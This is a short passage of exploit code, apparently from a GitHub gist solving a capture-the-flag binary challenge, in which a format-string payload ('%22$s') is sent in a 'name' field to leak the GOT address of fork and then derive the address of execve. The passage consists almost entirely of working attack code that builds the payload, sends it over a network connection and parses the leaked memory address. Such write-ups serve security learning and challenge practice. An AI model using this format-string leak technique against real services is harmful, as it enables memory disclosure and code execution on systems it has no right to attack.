# Step 1c--- Get the address of execve | |
LEAKFORKADDR = dword_to_bitstring(location_got_fork) | |
LEAKFORKADDR += "%22$s:ENFORK:" | |
nc.read_until("Your choice: ") | |
nc.write("1" + "\n") | |
nc.read_until("Insert name: ") | |
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
nc.read_until("Uranium in nuclear plant \"") | |
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8]) | |
addrexecve = addrfork + 0x320 | |
print "[+] Address of fork :", hex(addrfork) | |
print " > Address of execve :", hex(addrexecve) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment